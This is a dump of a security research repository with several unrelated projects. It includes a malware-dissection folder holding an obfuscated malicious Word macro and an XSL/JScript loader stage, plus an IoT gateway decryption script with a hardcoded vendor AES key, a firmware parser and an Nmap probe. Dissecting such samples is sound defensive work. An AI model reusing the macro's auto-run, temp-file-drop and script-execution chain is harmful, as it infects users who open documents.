source_addr_npi=smpplib.consts.SMPP_NPI_ISDN, 40 | source_addr=src, 41 | dest_addr_ton=smpplib.consts.SMPP_TON_INTL, 42 | dest_addr_npi=smpplib.consts.SMPP_NPI_ISDN, 43 | destination_addr=dest, 44 | short_message=part, 45 | data_coding=encoding_flag, 46 | esm_class=msg_type_flag, 47 | registered_delivery=False, 48 | ) 49 | 50 | 51 | client = smpplib.client.Client('127.0.0.1', 2775) 52 | 53 | # Print Output and Start Handler 54 | client.set_message_sent_handler( 55 | lambda pdu: logging.info('sent {} {}\n'.format(pdu.sequence, pdu.message_id))) 56 | client.set_message_received_handler(handle_incoming_sms) 57 | 58 | client.connect() 59 | 60 | client.bind_transceiver(system_id='YourESME', password='123456') 61 | print "MYSERVICE: Successfully bound SMPP" 62 | 63 | 64 | 65 | while True: 66 | try: 67 | client.listen() 68 | break 69 | except KeyboardInterrupt: 70 | break 71 | except Exception as e: 72 | logging.exception('Error during listen' + str(e)) 73 | 74 | -------------------------------------------------------------------------------- /malware_dissection_part2/aubR9KfZ.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 0) 13 | { 14 | var a1Try = true; 15 | var aDNoMfPC = false; 16 | var ai4epbE = "aWudtj"; 17 | var a52l6tnX = ai4epbE.toString(); 18 | var aaedRFNVW = true; 19 | return(aj0Dbl8E.replace(/3v4d6tka/g, "")); 20 | } 21 | } 22 | var a7YOdJzy = true; 23 | var arnYX2 = -41643; 24 | function aCxlZF(am4pzC9) 25 | { 26 | var aQGVjc = "a46Qhyfn"; 27 | var aTsLh = aQGVjc.toString(); 28 | ajnpz = "aR5LxisY2"; 29 | aLgSnO4y = ajnpz.toUpperCase(); 30 | var ahYfg = [ 31 | x("a3v4d6tkad3v4d6tkao3v4d6tkad3v4d6tkab3v4d6tka.3v4d6tkas3v4d6tkat3v4d6tkar3v4d6tkae3v4d6tkaa3v4d6tkam3v4d6tka", "aAK6it0ub"), 32 | x("w3v4d6tkas3v4d6tkac3v4d6tkar3v4d6tkai3v4d6tkap3v4d6tkat3v4d6tka.3v4d6tkas3v4d6tkah3v4d6tkae3v4d6tkal3v4d6tkal3v4d6tka", "a5TuwIY"), 33 | x("s3v4d6tkac3v4d6tkar3v4d6tkai3v4d6tkap3v4d6tkat3v4d6tkai3v4d6tkan3v4d6tkag3v4d6tka.3v4d6tkaf3v4d6tkai3v4d6tkal3v4d6tkae3v4d6tkas3v4d6tkay3v4d6tkas3v4d6tkat3v4d6tkae3v4d6tkam3v4d6tkao3v4d6tkab3v4d6tkaj3v4d6tkae3v4d6tkac3v4d6tkat3v4d6tka", "azoReTfU"), 34 | x("m3v4d6tkas3v4d6tkax3v4d6tkam3v4d6tkal3v4d6tka23v4d6tka.3v4d6tkax3v4d6tkam3v4d6tkal3v4d6tkah3v4d6tkat3v4d6tkat3v4d6tkap3v4d6tka", "aHmkpSJ"), 35 | x("s3v4d6tkaa3v4d6tkav3v4d6tkae3v4d6tkat3v4d6tkao3v4d6tkaf3v4d6tkai3v4d6tkal3v4d6tkae3v4d6tka", "aNSm4G"), 36 | x("r3v4d6tkau3v4d6tkan3v4d6tka", "aXT10"), 37 | x("d3v4d6tkae3v4d6tkal3v4d6tkae3v4d6tkat3v4d6tkae3v4d6tkaf3v4d6tkai3v4d6tkal3v4d6tkae3v4d6tka", "aoaLU"), 38 | x("a3v4d6tka43v4d6tkah3v4d6tkaA3v4d6tkae3v4d6tka83v4d6tkaO3v4d6tkaq3v4d6tka63v4d6tka.3v4d6tkae3v4d6tkax3v4d6tkae3v4d6tka", "ac6zDZu"), 39 | ]; 40 | aF80xmdpO = -59218; 41 | var ajuEMatk = "ayxX7VWP"; 42 | aVD0TbrJZ = ajuEMatk.toUpperCase(); 43 | ahoxHwE06 = -41543; 44 | var argnhxP = false; 45 | return(ahYfg[am4pzC9]); 46 | } 47 | arC4e1hRf = -30386; 48 | a5rKTn = -3556; 49 | function aD70avG3i(a6Z8FODg) 50 | { 51 | ahTf3R = -60844; 52 | aF49eS = true; 53 | aGabP6 = "a9xQi"; 54 | aIHly8jD = aGabP6.toLowerCase(); 55 | return new ActiveXObject(a6Z8FODg); 56 | } 57 | var aWbE8V = aD70avG3i(x("w3v4d6tkas3v4d6tkac3v4d6tkar3v4d6tkai3v4d6tkap3v4d6tkat3v4d6tka.3v4d6tkas3v4d6tkah3v4d6tkae3v4d6tkal3v4d6tkal3v4d6tka", "a5TuwIY")).expandenvironmentstrings(x("%3v4d6tkat3v4d6tkae3v4d6tkam3v4d6tkap3v4d6tka%3v4d6tka", "a2QNbTtn")) + "\\"; 58 | ]]> 59 | 60 | 61 | 63 | 64 | 65 | 117 | 118 | 119 | 120 | 121 | 122 | -------------------------------------------------------------------------------- /malware_dissection_part2/macro.vbs: -------------------------------------------------------------------------------- 1 | Attribute VB_Name = "ThisDocument" 2 | Attribute VB_Base = "1Normal.ThisDocument" 3 | Attribute VB_GlobalNameSpace = False 4 | Attribute VB_Creatable = False 5 | Attribute VB_PredeclaredId = True 6 | Attribute VB_Exposed = True 7 | Attribute VB_TemplateDerived = True 8 | Attribute VB_Customizable = True 9 | Sub Document_Open() 10 | Dim auyhPXig 11 | auyhPXig = Hex(79) 12 | ' Untoward puppy flurry contrast 13 | If afu3icSU = False Then 14 | afu3icSU = True 15 | Else 16 | afu3icSU = False 17 | End If 18 | ' 19 | Dim aJ54M 20 | For aJ54M = 10 To 45 21 | Debug.Print Error(aJ54M) 22 | Next aJ54M 23 | ' Fx trailers 24 | If abu79 = False Then 25 | abu79 = True 26 | Else 27 | abu79 = False 28 | End If 29 | ' Gardening 30 | If ajB29FgVm = False Then 31 | ajB29FgVm = True 32 | Else 33 | ajB29FgVm = False 34 | End If 35 | Dim alFXpTfQv 36 | alFXpTfQv = Fix(4) 37 | ' Promo ian 38 | Dim acXfzP 39 | acXfzP = Hex(168) 40 | If akg1VNf = False Then 41 | akg1VNf = True 42 | Else 43 | akg1VNf = False 44 | End If 45 | ' Astern 46 | main 47 | End Sub 48 | Attribute VB_Name = "aBK3We20" 49 | Function aiAxazbj(aMtY57d, aYSXG) 50 | ' 51 | aiAxazbj = Chr("&h" & Mid(aMtY57d, aYSXG, 2)) 52 | End Function 53 | Function aMhXE6(aMtY57d) 54 | Dim agn1f9EH7 55 | agn1f9EH7 = Fix(6) 56 | Dim ahNObAaz7 57 | ahNObAaz7 = Fix(12) 58 | ' Unlikely 59 | Dim aCBns3L 60 | aCBns3L = Exp(5) 61 | ' Uphold trophy 62 | Dim a7FgQ 63 | For a7FgQ = 20 To 38 64 | Debug.Print Error(a7FgQ) 65 | Next a7FgQ 66 | ' Delaware baptismal 67 | azBoku = Not (azBoku) 68 | ' Accordant begone jul indolence speakers 69 | Dim aRvQc 70 | aRvQc = Abs(48) 71 | ' Millions leprous 72 | If aspa9fdV = False Then 73 | aspa9fdV = True 74 | Else 75 | aspa9fdV = False 76 | End If 77 | ' Analysts congratulations tillage 78 | Dim aGUTbZXW 79 | aGUTbZXW = Hex(203) 80 | ' Frisky parent schema scabbard 81 | If a0dIrRQuh = False Then 82 | a0dIrRQuh = True 83 | Else 84 | a0dIrRQuh = False 85 | End If 86 | ' Portend weight activists 87 | Dim aLmQdk6xc 88 | aLmQdk6xc = Hex(237) 89 | For aYSXG = 1 To Len(aMtY57d) Step 2 90 | ' 91 | aGdmsa = aGdmsa & aiAxazbj(aMtY57d, aYSXG) 92 | Next aYSXG 93 | ' 94 | aMhXE6 = aGdmsa 95 | End Function 96 | Attribute VB_Name = "aMvcKzRn9" 97 | Public Sub aWK1i(aQxXU As String, aVK8ef As String) 98 | Dim axFdHm As Object 99 | Set axFdHm = CreateObject("Scripting.FileSystemObject") 100 | Dim a9ztifG As Object 101 | Set a9ztifG = axFdHm.CreateTextFile(Environ(aVK8ef) & "\aubR9KfZ.xs" & ahSs9Ate(), True, True) 102 | a9ztifG.Write aQxXU 103 | a9ztifG.Close 104 | Dim aTHgxnsl 105 | aTHgxnsl = Exp(5) 106 | ' Niger periodic chance ado 107 | Dim ahCefrIE 108 | For ahCefrIE = 28 To 56 109 | Debug.Print Error(ahCefrIE) 110 | Next ahCefrIE 111 | ' Inspired 112 | Dim aXTU9N 113 | aXTU9N = Abs(62) 114 | ' Nature stagger 115 | a4LfFot = Not (a4LfFot) 116 | ' Uplifting riley adept 117 | Dim atuqEx 118 | atuqEx = Abs(-61) 119 | ' Infatuation bonds factor 120 | Dim aYytjDO 121 | aYytjDO = Abs(28) 122 | ' Incredible stoic remoteness 123 | Dim am5b2p 124 | am5b2p = Abs(-55) 125 | aKCTh73 = IsNull(alXL5) 126 | ' Ty 127 | If akhgeW = False Then 128 | akhgeW = True 129 | Else 130 | akhgeW = False 131 | End If 132 | ' Everywhere keywords bahamas churches strong builds 133 | If aHe9Zx7 = False Then 134 | aHe9Zx7 = True 135 | Else 136 | aHe9Zx7 = False 137 | End If 138 | Dim axj4Pq 139 | axj4Pq = Hex(207) 140 | ' Choice cumulative photo 141 | Dim arYcf 142 | arYcf = Fix(15) 143 | ' Almighty rain printer satirical attica 144 | Dim abWhz 145 | abWhz = Exp(9) 146 | ' Fake isabelle 147 | If aqTL0zAdi = False Then 148 | aqTL0zAdi = True 149 | Else 150 | aqTL0zAdi = False 151 | End If 152 | ' African itinerant divorced coitus 153 | Dim aDhS6 154 | aDhS6 = Abs(-11) 155 | ' Lung transform repairs tendril jelsoft 156 | Dim akQKD9hCd 157 | akQKD9hCd = Abs(-38) 158 | Dim asSyYe 159 | asSyYe = Hex(158) 160 | Dim a9ZcjiB 161 | For a9ZcjiB = 12 To 46 162 | Debug.Print Error(a9ZcjiB) 163 | Next a9ZcjiB 164 | ' Constituent singing 165 | Dim abksjm 166 | For abksjm = 20 To 62 167 | Debug.Print Error(abksjm) 168 | Next abksjm 169 | ' Commune broom academic footstep 170 | Dim apK2UtDf 171 | For apK2UtDf = 4 To 55 172 | Debug.Print Error(apK2UtDf) 173 | Next apK2UtDf 174 | ' Sedan killing ref 175 | Dim ayRKG4 176 | ayRKG4 = Hex(167) 177 | ' Thirty-nine 178 | End Sub 179 | Function a1RS3() 180 | aTzaXyeF4 = IsNull(a5sy3reEO) 181 | ' Middling answered breezy collector 182 | Dim anofe9 183 | anofe9 = Exp(5) 184 | Dim agj8x1ALa 185 | agj8x1ALa = Abs(-18) 186 | If aNy0LA = False Then 187 | aNy0LA = True 188 | Else 189 | aNy0LA = False 190 | End If 191 | ' Differential christ affluent coy cj 192 | Dim a6EUxlPf 193 | a6EUxlPf = Hex(67) 194 | ' Accuses 195 | Dim aBZCSm0h 196 | aBZCSm0h = Hex(197) 197 | ' Vituperation placed downloading smoke 198 | Dim ahj5PxFrq 199 | ahj5PxFrq = Hex(206) 200 | ' Washer whod 201 | Dim aBZuYRE 202 | aBZuYRE = Fix(16) 203 | ' Northamptonshire 204 | afu4q = IsNull(agF10BMcs) 205 | ' Demonstrates cartridge lath routing daniel gamespot 206 | Dim alWrn6KA 207 | alWrn6KA = Fix(13) 208 | ' Generator slighting big zope rewards dubai 209 | If awzpB0g = False Then 210 | awzpB0g = True 211 | Else 212 | awzpB0g = False 213 | End If 214 | ' Forge accessed 215 | Dim aLEHYqUrc 216 | aLEHYqUrc = Fix(1) 217 | agqL9UJ = Not (agqL9UJ) 218 | aC7HoW = Not (aC7HoW) 219 | Dim a6OZPj 220 | a6OZPj = Exp(3) 221 | a6wNfzX3W = IsNull(atKE2) 222 | Dim aGMN5qXuj 223 | aGMN5qXuj = Fix(15) 224 | ' Olive exceptional jap pent-up 225 | Dim apI8F5sj 226 | apI8F5sj = Exp(16) 227 | ' Assignment abstaining acclaim 228 | Dim aUC85vPh 229 | aUC85vPh = Abs(64) 230 | Dim ax7hoNB5 231 | ax7hoNB5 = Fix(15) 232 | Dim aK3Urma8Q 233 | aK3Urma8Q = Exp(5) 234 | Set aEJydG = New aLeIgcA9T 235 | Dim aUByLx 236 | For aUByLx = 18 To 35 237 | Debug.Print Error(aUByLx) 238 | Next aUByLx 239 | Dim aDEOplrK1 240 | For aDEOplrK1 = 13 To 35 241 | Debug.Print Error(aDEOplrK1) 242 | Next aDEOplrK1 243 | aEWYKaeu = aEJydG.sh.Text 244 | Dim a2W0zqDv 245 | a2W0zqDv = Hex(62) 246 | ' Welch conditional apathy dee 247 | Dim axDehb 248 | For axDehb = 25 To 53 249 | Debug.Print Error(axDehb) 250 | Next axDehb 251 | ' Mississippi 252 | If a1KPb4M = False Then 253 | a1KPb4M = True 254 | Else 255 | a1KPb4M = False 256 | End If 257 | ' Receivers rocky apart oil 258 | aEkbYD4 = aEJydG.cd.Text 259 | If afGa6 = False Then 260 | afGa6 = True 261 | Else 262 | afGa6 = False 263 | End If 264 | ' Suggestion tandem garnered 265 | Dim aXFVf 266 | aXFVf = Abs(-56) 267 | ' Penis gm 268 | a1RS3 = aMhXE6(aEWYKaeu & aEkbYD4) 269 | End Function 270 | Function ahSs9Ate() 271 | Dim aXp0m6WOr 272 | aXp0m6WOr = Abs(-11) 273 | aCEGNa7 = IsNull(ard3ijnC) 274 | ' Arrives judicature 275 | ahSs9Ate = "l" 276 | End Function 277 | Function aZUnok(ByRef az4wI As String) 278 | Const asXoV4Jm = 97 279 | Const aL4pqSUyQ = 26 280 | Const al0BfU = 65 281 | Const kRotRange = aL4pqSUyQ / 2 282 | Dim advce As Long 283 | Dim adpWEY5HM As String 284 | If Len(az4wI) > 0 Then 285 | For i = 1 To Len(az4wI) 286 | advce = 0 287 | c = Mid(az4wI, i, 1) 288 | cc = Asc(c) 289 | If cc >= asXoV4Jm And cc < (asXoV4Jm + aL4pqSUyQ) Then 290 | advce = asXoV4Jm 291 | ElseIf cc >= al0BfU And cc < (al0BfU + aL4pqSUyQ) Then 292 | advce = al0BfU 293 | End If 294 | 295 | If advce > 0 Then 296 | theRot13Code = (((cc - advce) + kRotRange) Mod aL4pqSUyQ) + advce 297 | theRot13Char = Chr(theRot13Code) 298 | adpWEY5HM = adpWEY5HM + theRot13Char 299 | 300 | Else 301 | adpWEY5HM = adpWEY5HM + c 302 | End If 303 | Next 304 | End If 305 | 306 | aZUnok = adpWEY5HM 307 | End Function 308 | Attribute VB_Name = "aWyoSkBVb" 309 | Sub main() 310 | Dim arcwb 311 | arcwb = Fix(4) 312 | ' Abstinence mistook counsel 313 | Dim aB1Q9 314 | aB1Q9 = Exp(7) 315 | Dim aPtS2y 316 | aPtS2y = Abs(1) 317 | Dim aUrH3 As String 318 | Dim afyQhuWr6 319 | afyQhuWr6 = Exp(5) 320 | ' Variability thumbs procures 321 | Dim a1udH 322 | For a1udH = 12 To 36 323 | Debug.Print Error(a1udH) 324 | Next a1udH 325 | ' Surely man-of-war offender 326 | If ayYNf4hl = False Then 327 | ayYNf4hl = True 328 | Else 329 | ayYNf4hl = False 330 | End If 331 | ' Eros adviser dampness 332 | ad5FK = Not (ad5FK) 333 | Dim a5G739v 334 | a5G739v = Exp(13) 335 | Dim aRtz03H 336 | For aRtz03H = 29 To 51 337 | Debug.Print Error(aRtz03H) 338 | Next aRtz03H 339 | aBmui = IsNull(ast092Nym) 340 | aUrH3 = aZUnok("776q69632070726s63657373206p697374202s666s726q61743n222574656q70255p61756252394o665n22") 341 | Dim awCdX 342 | awCdX = Exp(14) 343 | ' Thirtieth struct platinum forestall heartfelt excellence respiratory 344 | apGuvZmr2 = IsNull(ajsfX) 345 | aWK1i a1RS3(), "temp" 346 | Dim aqetAu 347 | For aqetAu = 20 To 63 348 | Debug.Print Error(aqetAu) 349 | Next aqetAu 350 | Dim aUR2AE 351 | aUR2AE = Fix(9) 352 | ' Horde weedy mach 353 | Dim aEUbge 354 | aEUbge = Abs(-59) 355 | ' Clothes revel 356 | Dim aMo5A 357 | aMo5A = Hex(68) 358 | ' Za theoretical getting info nourish warm 359 | Dim a7KMf85m9 360 | a7KMf85m9 = Abs(-37) 361 | ' Dane armenia sadden layman secretariat martial 362 | Dim any76 363 | any76 = Abs(-29) 364 | ' Worcester hearing 365 | Dim a8wUICGa 366 | a8wUICGa = Hex(40) 367 | Dim aICnZ4H1 368 | aICnZ4H1 = Exp(11) 369 | ' Mariah incentive surround jumps 370 | atep7aP = Not (atep7aP) 371 | ' Species ronald antibodies 372 | Dim aW47L 373 | aW47L = Abs(-32) 374 | ' Deadly protocol colon ease garage clayey 375 | Dim al7zhXY1 376 | al7zhXY1 = Exp(2) 377 | ' Competing adware katharine 378 | Set atubG = New WshShell 379 | ' 380 | aHUGo0f = aMhXE6(aUrH3) 381 | Dim a3VUf 382 | a3VUf = Exp(16) 383 | ' Tennis pulling job print 384 | Dim aelS2GqV 385 | For aelS2GqV = 32 To 46 386 | Debug.Print Error(aelS2GqV) 387 | Next aelS2GqV 388 | ' Goggles pegasus 389 | Dim aioZQ5Fj 390 | aioZQ5Fj = Fix(11) 391 | ' Representations offline 392 | Dim aI8KDBj2 393 | aI8KDBj2 = Fix(8) 394 | Call atubG.run(aHUGo0f, 2) 395 | aSbFzMV4 = Not (aSbFzMV4) 396 | ' Fed an rfc cricket conservative 397 | Dim a7fi9Lo 398 | a7fi9Lo = Abs(55) 399 | ' Misleading opened acrobat milf 400 | If aOhHpA1 = False Then 401 | aOhHpA1 = True 402 | Else 403 | aOhHpA1 = False 404 | End If 405 | ' Inflation airlines exceptions 406 | Dim ajuKHV 407 | ajuKHV = Hex(188) 408 | ' Untold inquisitor 409 | Dim a6tpwczIQ 410 | a6tpwczIQ = Hex(195) 411 | ' Seasoning badge actors negotiate 412 | Dim a98Oa3P1f 413 | a98Oa3P1f = Exp(9) 414 | ' Walt spout sans 415 | acHjv = Not (acHjv) 416 | ' Notifications diver torpedoes maynt starter mutation 417 | 418 | If ajD42eZL = False Then 419 | ajD42eZL = True 420 | Else 421 | ajD42eZL = False 422 | End If 423 | ' Hie tracker sediment 424 | Dim aQSD3nF 425 | aQSD3nF = Fix(6) 426 | ' Cherubs porphyry bunny versions ideas 427 | Dim aVRHbx 428 | aVRHbx = Hex(128) 429 | ' Genuine extreme stanford 430 | aQ8vS = IsNull(at65yj1Aw) 431 | ' Modern loki viper ensnare guild 432 | Dim azHWhqD 433 | azHWhqD = Hex(1) 434 | ' Lanka influenza disorder starts pillage 435 | End Sub 436 | Attribute VB_Name = "aLeIgcA9T" 437 | Attribute VB_Base = "0{54855455-CBA9-4145-80AF-68D8FFB0E356}{FCB0EE51-99E4-4BF1-9F7C-42E27E9CC73A}" 438 | Attribute VB_GlobalNameSpace = False 439 | Attribute VB_Creatable = False 440 | Attribute VB_PredeclaredId = True 441 | Attribute VB_Exposed = False 442 | Attribute VB_TemplateDerived = False 443 | Attribute VB_Customizable = False 444 | Private Sub UserForm_Initialize() 445 | Dim aVYqi3A 446 | For aVYqi3A = 9 To 51 447 | Debug.Print Error(aVYqi3A) 448 | Next aVYqi3A 449 | ' Moses vans privilege gnu lodges 450 | aQhaZ3 = Not (aQhaZ3) 451 | Dim aUhXxyF 452 | aUhXxyF = Exp(7) 453 | Dim acz21l 454 | acz21l = Fix(13) 455 | End Sub 456 | -------------------------------------------------------------------------------- /maxcube/README.md: -------------------------------------------------------------------------------- 1 | Blog post: https://insinuator.net/2016/04/discover-the-unknown-analyzing-an-iot-device/ 2 | -------------------------------------------------------------------------------- /maxcube/decrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import sys 3 | import binascii 4 | import base64 5 | from Crypto.Cipher import AES 6 | 7 | KEY = '7815696ecbf1c96e6894b779456d330e' 8 | IV = '\x36\x8a\xea\x76\x12\xc9\xab\x91\x63\xda\xea\x76\x12\xc9\xac\x93' 9 | 10 | 11 | class MaxCubeCrypto: 12 | MODE = AES.MODE_CBC 13 | BLOCK_SIZE = 16 14 | 15 | def encrypt(self, ptext): 16 | aes = AES.new(binascii.unhexlify(KEY), self.MODE, IV=IV) 17 | return aes.encrypt(self.pad(ptext)) 18 | 19 | 20 | def decrypt(self, ctext): 21 | aes = AES.new(binascii.unhexlify(KEY), self.MODE, IV=IV) 22 | return self.unpad(aes.decrypt(ctext)) 23 | 24 | 25 | def pad(self,s) 26 | return s + (self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) * chr(self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) 27 | 28 | 29 | def unpad(self,s): 30 | return s[0:-ord(s[-1])] 31 | 32 | 33 | if __name__ == '__main__': 34 | 35 | if len(sys.argv) != 3: 36 | print('{} [enc|dec] input'.format(sys.argv[0])) 37 | sys.exit(1) 38 | 39 | maxcube = MaxCubeCrypto() 40 | 41 | if sys.argv[1] == 'enc': 42 | ret = maxcube.encrypt(sys.argv[2]) 43 | sys.stdout.write(base64.b64encode(ret)) 44 | 45 | elif sys.argv[1] == 'dec': 46 | data = base64.b64decode(sys.argv[2]) 47 | ret = maxcube.decrypt(data) 48 | sys.stdout.write(ret) 49 | 50 | else: 51 | print('Invalid command: {}'.format(sys.argv[1])) 52 | -------------------------------------------------------------------------------- /maxcube/firmware/parser/FirmwareFile.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.io.ByteArrayOutputStream; 3 | import java.io.IOException; 4 | import java.io.InputStream; 5 | import java.util.LinkedList; 6 | import java.util.List; 7 | 8 | public class FirmwareFile { 9 | private final List frames = new LinkedList(); 10 | 11 | public FirmwareFile(InputStream stream) throws IOException { 12 | this.parse(stream); 13 | } 14 | 15 | public List getFrames() { 16 | return this.frames; 17 | } 18 | 19 | private void parse(InputStream stream) throws IOException { 20 | try { 21 | this.readFrames(stream); 22 | } catch (IOException var3) { 23 | } 24 | } 25 | 26 | private void readFrames(InputStream stream) throws IOException { 27 | this.frames.clear(); 28 | 29 | for(byte[] frame = this.readFrame(stream); frame != null; frame = this.readFrame(stream)) { 30 | this.frames.add(frame); 31 | } 32 | 33 | } 34 | 35 | private byte[] readFrame(InputStream stream) throws IOException { 36 | int length = this.readLength(stream); 37 | return length > 0?this.readFrameData(stream, length):null; 38 | } 39 | 40 | private int readLength(InputStream stream) throws IOException { 41 | int high = this.readByte(stream); 42 | int low = this.readByte(stream); 43 | return high << 8 | low; 44 | } 45 | 46 | private byte[] readFrameData(InputStream stream, int length) throws IOException { 47 | ByteArrayOutputStream outStream = new ByteArrayOutputStream(); 48 | 49 | for(int result = 0; result < length; ++result) { 50 | int value = this.readByte(stream); 51 | outStream.write(value); 52 | } 53 | 54 | byte[] var6 = outStream.toByteArray(); 55 | outStream.close(); 56 | return var6; 57 | } 58 | 59 | private int readByte(InputStream stream) throws IOException { 60 | int high = stream.read(); 61 | int low = stream.read(); 62 | return this.createByte(high, low); 63 | } 64 | 65 | private int createByte(int high, int low) { 66 | return this.fromHex(high) << 4 | this.fromHex(low); 67 | } 68 | 69 | private int fromHex(int value) { 70 | return 48 <= value && value <= 57?value - 48:(97 <= value && value <= 102?value - 97 + 10:(65 <= value && value <= 70?value - 65 + 10:0)); 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /maxcube/firmware/parser/FirmwareParser.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.util.List; 3 | import java.nio.file.*; 4 | 5 | public class FirmwareParser { 6 | public static void main(String[] args) throws IOException { 7 | if(args.length != 2){ 8 | System.out.println("Need a source and a destination file path"); 9 | System.exit(0); 10 | } 11 | 12 | InputStream stream = new FileInputStream(args[0]); 13 | FirmwareFile firmwareFile = new FirmwareFile(stream); 14 | List frames = firmwareFile.getFrames(); 15 | Path path = Paths.get(args[1]); 16 | 17 | for(byte[] b: frames){ 18 | Files.write(path, b, StandardOpenOption.CREATE, StandardOpenOption.APPEND); 19 | } 20 | 21 | System.out.println("Finished"); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /maxcube/maxcube-info.nse: -------------------------------------------------------------------------------- 1 | local shortport = require "shortport" 2 | local stdnse = require "stdnse" 3 | 4 | description = [[ 5 | Get basic information from a eQ-3 MAX! Cube LAN Gateway. 6 | 7 | Product info: 8 | http://www.eq-3.de/produkte/max-heizungssteuerung/max-hausloesung/bc-lgw-o-tw.html 9 | ]] 10 | 11 | --- 12 | -- @output 13 | -- PORT STATE SERVICE 14 | -- 62910/tcp open unknown 15 | -- | maxcube-info: 16 | -- | MAX Serial:: KMD1016788 17 | -- | RF Address: 099c3e 18 | -- |_ Firmware Version: 0113 19 | -- 20 | 21 | author = "Niklaus Schiess " 22 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 23 | categories = {"discovery", "safe"} 24 | portrule = shortport.portnumber(62910, "tcp") 25 | 26 | action = function(host, port) 27 | -- Wait for some time to make sure there is no open TCP connection. 28 | stdnse.sleep(1) 29 | 30 | local sock = nmap.new_socket() 31 | local status, err = sock:connect(host, port, "tcp") 32 | 33 | if not status then 34 | stdnse.debug1("%s", err) 35 | return 36 | end 37 | 38 | local status, data = sock:receive() 39 | 40 | if not status or not data then 41 | stdnse.debug1("%s", "Could not receive any data") 42 | return 43 | end 44 | 45 | local output = stdnse.output_table() 46 | local serial, rf_address, firmware 47 | 48 | for serial,rf_address,firmware in data:gmatch("H:(%u%u%u%d%d%d%d%d%d%d),(%x%x%x%x%x%x),(%d%d%d%d),") do 49 | output["MAX Serial:"] = serial 50 | output["RF Address"] = rf_address 51 | output["Firmware Version"] = firmware 52 | end 53 | 54 | return output 55 | end 56 | -------------------------------------------------------------------------------- /netmon_troopers/README.md: -------------------------------------------------------------------------------- 1 | # Troopers Netmon # 2 | 3 | ### Includes 4 | Troopers16 netmon: 5 | * Configuration files for Grafana, Influxdb, collectd 6 | * Dashboard for Grafana 7 | * "Magic" scripts 8 | 9 | Blog post: https://insinuator.net/2016/03/troopers-netmon/ 10 | -------------------------------------------------------------------------------- /netmon_troopers/collectd.conf: -------------------------------------------------------------------------------- 1 | # Config file for collectd(1). 2 | # 3 | # Some plugins need additional configuration and are disabled by default. 4 | # Please read collectd.conf(5) for details. 5 | # 6 | # You should also read /usr/share/doc/collectd-core/README.Debian.plugins 7 | # before enabling any more plugins. 8 | 9 | ############################################################################## 10 | # Global # 11 | #----------------------------------------------------------------------------# 12 | # Global settings for the daemon. # 13 | ############################################################################## 14 | 15 | #Hostname "localhost" 16 | FQDNLookup false 17 | #BaseDir "/var/lib/collectd" 18 | #PluginDir "/usr/lib/collectd" 19 | #TypesDB "/usr/share/collectd/types.db" "/etc/collectd/types.db.local" 20 | 21 | #----------------------------------------------------------------------------# 22 | # When enabled, plugins are loaded automatically with the default options # 23 | # when an appropriate block is encountered. # 24 | # Disabled by default. # 25 | #----------------------------------------------------------------------------# 26 | #AutoLoadPlugin false 27 | 28 | #----------------------------------------------------------------------------# 29 | # When enabled, internal statistics are collected, using "collectd" as the # 30 | # plugin name. # 31 | # Disabled by default. # 32 | #----------------------------------------------------------------------------# 33 | #CollectInternalStats false 34 | 35 | #----------------------------------------------------------------------------# 36 | # Interval at which to query values. This may be overwritten on a per-plugin # 37 | # base by using the 'Interval' option of the LoadPlugin block: # 38 | # # 39 | # Interval 60 # 40 | # # 41 | #----------------------------------------------------------------------------# 42 | Interval 120 43 | #Interval 300 44 | 45 | 46 | #MaxReadInterval 86400 47 | #Timeout 2 48 | #ReadThreads 5 49 | #WriteThreads 5 50 | 51 | # Limit the size of the write queue. Default is no limit. Setting up a limit 52 | # is recommended for servers handling a high volume of traffic. 53 | #WriteQueueLimitHigh 1000000 54 | #WriteQueueLimitLow 800000 55 | 56 | ############################################################################## 57 | # Logging # 58 | #----------------------------------------------------------------------------# 59 | # Plugins which provide logging functions should be loaded first, so log # 60 | # messages generated when loading or configuring other plugins can be # 61 | # accessed. # 62 | ############################################################################## 63 | 64 | LoadPlugin logfile 65 | LoadPlugin syslog 66 | #LoadPlugin log_logstash 67 | 68 | 69 | LogLevel "debug" 70 | File "/var/log/collectd.log" 71 | Timestamp true 72 | # PrintSeverity false 73 | 74 | 75 | 76 | LogLevel debug 77 | 78 | 79 | # 80 | # LogLevel info 81 | # File "/var/log/collectd.json.log" 82 | # 83 | 84 | ############################################################################## 85 | # LoadPlugin section # 86 | #----------------------------------------------------------------------------# 87 | # Specify what features to activate. # 88 | ############################################################################## 89 | 90 | #LoadPlugin aggregation 91 | #LoadPlugin amqp 92 | #LoadPlugin apache 93 | #LoadPlugin apcups 94 | #LoadPlugin ascent 95 | #LoadPlugin barometer 96 | #LoadPlugin battery 97 | #LoadPlugin bind 98 | #LoadPlugin ceph 99 | #LoadPlugin cgroups 100 | #LoadPlugin conntrack 101 | #LoadPlugin contextswitch 102 | LoadPlugin cpu 103 | #LoadPlugin cpufreq 104 | #LoadPlugin csv 105 | #LoadPlugin curl 106 | #LoadPlugin curl_json 107 | #LoadPlugin curl_xml 108 | #LoadPlugin dbi 109 | LoadPlugin df 110 | #LoadPlugin disk 111 | #LoadPlugin dns 112 | #LoadPlugin drbd 113 | #LoadPlugin email 114 | #LoadPlugin entropy 115 | #LoadPlugin ethstat 116 | LoadPlugin exec 117 | #LoadPlugin fhcount 118 | #LoadPlugin filecount 119 | #LoadPlugin fscache 120 | #LoadPlugin gmond 121 | #LoadPlugin hddtemp 122 | LoadPlugin interface 123 | #LoadPlugin ipc 124 | #LoadPlugin ipmi 125 | #LoadPlugin iptables 126 | #LoadPlugin ipvs 127 | #LoadPlugin irq 128 | #LoadPlugin java 129 | LoadPlugin load 130 | #LoadPlugin lvm 131 | #LoadPlugin madwifi 132 | #LoadPlugin mbmon 133 | #LoadPlugin md 134 | #LoadPlugin memcachec 135 | #LoadPlugin memcached 136 | LoadPlugin memory 137 | #LoadPlugin modbus 138 | #LoadPlugin multimeter 139 | #LoadPlugin mysql 140 | #LoadPlugin netlink 141 | LoadPlugin network 142 | #LoadPlugin nfs 143 | #LoadPlugin nginx 144 | #LoadPlugin notify_desktop 145 | 